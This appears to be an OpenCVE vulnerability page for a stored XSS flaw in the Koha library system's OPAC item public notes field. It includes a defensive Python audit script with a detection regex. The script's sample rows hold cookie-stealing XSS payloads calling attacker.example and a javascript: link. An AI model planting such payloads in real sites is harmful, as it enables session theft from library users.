Description
A stored cross-site scripting (XSS) vulnerability in the OPAC item detail page of Koha Library Management System through 25.11 allows an authenticated remote attacker with edit_items permission to inject arbitrary web scripts via the item public notes field (items.itemnotes).
Published: 2026-06-26
Score: n/a
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A stored cross‑site scripting (XSS) vulnerability exists in the Koha OPAC item detail page. An authenticated attacker who holds the edit_items permission can store arbitrary HTML or script in the item public notes field (items.itemnotes), which the OPAC renders without neutralising it. The injected script then runs in the browser of every OPAC user who views that item's detail page, in the OPAC's origin, so it can act with whatever session the viewer has in the public catalogue.
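
The mechanism above, and the audit a library should run once the permission has been tightened, as an added illustration that is not Koha's own code: the two rendering helpers, the audit regular expression and the sample notes are all constructed here, and the hostname `attacker.example` in the payloads is a placeholder. The vulnerable helper interpolates the stored note into the page as-is (the CWE-79 pattern); the fixed helper HTML-encodes it on output, which in Koha's Template Toolkit templates corresponds to the `| html` filter (a Koha convention, not quoted from any patch, which this page does not show). `tags_in` parses the rendered markup the way a browser would, so you can see which version actually produces a `script`, `img` or `a` element from the note, and `find_suspicious_notes` flags the rows a cataloguer should review.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample rows (itemnumber, items.itemnotes); not data from any real Koha instance.
# Rows 1002-1004 carry the kind of payload an edit_items holder could store; 1001 and 1005 are benign.
SAMPLE_ITEMS = [
    (1001, "Signed by the author; shelved in Special Collections."),
    (1002, "<script>document.location='https://attacker.example/?c='+document.cookie</script>"),
    (1003, "Copy 2 <img src=x onerror=\"fetch('https://attacker.example/'+document.cookie)\">"),
    (1004, "<a href=\"javascript:alert(document.domain)\">Reserve this copy</a>"),
    (1005, "Condition = good, minor water damage on cover"),
]

# Heuristic for auditing stored notes: any HTML tag, an on* event-handler attribute,
# or a javascript: URL. It surfaces rows for human review; it is not a sanitiser.
SUSPICIOUS = re.compile(r"<\s*/?\s*[a-z][^>]*>|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)


def render_public_notes_vulnerable(note: str) -> str:
    """The CWE-79 pattern: the stored field is interpolated into the page as-is."""
    return f'<div class="item-notes">{note}</div>'


def render_public_notes_fixed(note: str) -> str:
    """Output encoding: every <, >, &, ' and " in the note becomes an entity,
    so the browser renders the note as text and never parses it as markup."""
    return f'<div class="item-notes">{html.escape(note, quote=True)}</div>'


class _TagCollector(HTMLParser):
    """Records every element start tag the browser-side parser would see."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)


def tags_in(markup: str) -> list:
    """Return the element names parsed from markup, in document order."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def find_suspicious_notes(rows) -> list:
    """Audit helper: itemnumbers whose public notes look like markup or script."""
    return sorted(itemnumber for itemnumber, note in rows if note and SUSPICIOUS.search(note))


if __name__ == "__main__":
    for itemnumber, note in SAMPLE_ITEMS:
        print(itemnumber,
              "vulnerable:", tags_in(render_public_notes_vulnerable(note)),
              "fixed:", tags_in(render_public_notes_fixed(note)))
    print("rows to review:", find_suspicious_notes(SAMPLE_ITEMS))
```

Against a live instance the rows for `find_suspicious_notes` would come from `SELECT itemnumber, itemnotes FROM items WHERE itemnotes IS NOT NULL`; the regex is deliberately broad, so expect some false positives from legitimate angle brackets in notes and review the hits by hand rather than deleting them automatically.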

Affected Systems

Koha Library Management System versions up to and including 25.11. No corrected release is named on this page, so every deployment on these versions should be treated as affected until the Koha project publishes a fix.

Risk and Exploitability

No CVSS or EPSS score is stated, so the exploit probability cannot be quantified, and the flaw is not listed in CISA's KEV catalog. Exploitation requires a staff account holding the edit_items permission (a cataloguing privilege), but any such account, whether compromised, shared or issued to someone who later turns hostile, can plant a script that persists in the item record and runs for every OPAC visitor who opens that item's detail page, logged-in patrons and anonymous users alike. No public exploit evidence is cited, so the actual likelihood is uncertain; the impact, if it is exploited, reaches every user of the public catalogue who views the affected item.

Generated by OpenCVE AI on June 27, 2026 at 00:22 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the official patch or upgrade to a corrected Koha release once the project publishes one; no fixed version is named on this page, so track the Koha security advisories for this CVE.
  • Restrict the edit_items permission to trusted cataloguing staff, audit which accounts currently hold it, and review the existing item public notes (items.itemnotes) for HTML or script content that may already have been stored.
  • As defence in depth, deploy a Content Security Policy on the OPAC that disallows inline scripts and untrusted script sources. Test it in staging first: the OPAC templates may rely on inline JavaScript, and a strict policy can break page functionality unless the inline scripts are allowed by nonce or hash.

Generated by OpenCVE AI on June 27, 2026 at 00:22 UTC.

Advisories

No advisories yet.

History

Sat, 27 Jun 2026 00:45:00 +0000

Type | Values Removed | Values Added
Title | | Authenticated Stored XSS in Koha OPAC Item Public Notes
Weaknesses | | CWE-79

Fri, 26 Jun 2026 22:00:00 +0000

Type | Values Removed | Values Added
Description | | A stored cross-site scripting (XSS) vulnerability in the OPAC item detail page of Koha Library Management System through 25.11 allows an authenticated remote attacker with edit_items permission to inject arbitrary web scripts via the item public notes field (items.itemnotes).
References | |

MITRE

Status: PUBLISHED

Assigner: mitre

Published:

Updated: 2026-06-26T21:37:56.281Z

Reserved: 2026-06-07T00:00:00.000Z

Link: CVE-2026-50766

Vulnrichment

No data.

NVD

No data.

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-27T00:30:05Z

Weaknesses
  • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')